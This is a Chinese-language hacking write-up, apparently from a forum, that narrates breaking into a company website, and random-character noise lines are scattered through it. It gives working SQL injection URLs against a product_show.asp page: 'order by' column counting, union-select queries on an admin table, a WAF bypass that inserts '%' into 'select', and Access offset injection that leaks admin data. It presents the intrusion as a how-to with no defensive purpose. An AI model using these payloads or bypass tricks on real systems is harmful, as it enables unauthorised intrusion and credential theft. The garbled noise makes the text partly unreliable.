打开网站,一个企业站。
3 Q1 B! ]9 g, D# l& t+ h
2 P5 A% \7 o) R% Z# B o/ z2 ]4 {: b/ ^2 g8 Y0 L9 Z6 ?( O
顺手加个admin
/ J! p0 D: _; z9 X6 E5 ^
1 j" h) x$ w& R5 ^
% q; ?; W2 Z) e0 }默认后台。
% o Z; @1 _2 x5 v/ b4 k6 B( ]回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
: y9 e9 Q" h$ O$ k% q. F+ o" O+ Z! h4 y
`) z& Z+ O% K/ E7 j
B/ P. b9 _" @所以就不用御剑扫了,待会直接封IP。
# c$ m; F& u$ `+ u) l 2 l- V6 s1 E, I9 N$ t
用order by语句判断是否存在注入。
# \$ [+ ], _& |* e" N" Uhttp://www.xxx.com /product_show.asp?id=997 order by 1
' y1 f; [: Z8 q% {http://www.xxx.com /product_show.asp?id=997 order by 100
, k. N6 y: c! _& X现在存在注入,经测试后发现是9个字段。
+ i3 B( S Q8 _% f
: N. r: O. u& ~$ z9 V; B+ f接下来进行联合查询,猜是否存在admin表。
: B h; a# c2 B( ]/ }http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。$ D* C2 [6 R9 B- ~7 W- o+ b
. C9 Z6 K. h3 L+ P% t2 r1 W
/ Q2 O3 l3 i9 W' Z
- \# e% D0 N+ x l) p7 }在select中间加个%,se%lect绕过安全狗。
2 V' D" U5 E5 X4 b& N1 t
# u' R4 Q: l- n- |
7 M9 X9 a( E* M发现存在admin表,然后开始手工猜常用的字段。
, C& Q9 ? v6 j1 t4 N! \1 _纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。. h0 z& L1 ]! {- ^: {" D* O9 |
, l2 ]1 ?: ?& b7 o) H突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。$ [# N, B; e. X; `: v) S
& `& W4 P0 r$ T" M# g7 j
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
: Z' W$ P# K' Dhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
1 a2 \$ Q# R3 f1 Y7 A4 Z G+ Z, `: Z好了,敏感内容出显了。
+ [1 _% g3 W7 @% }9 w9 E% X3 f2 H# g) I# A) x' w
" `. U, }. x& G
O# d" A/ r7 ~. s+ S, q
|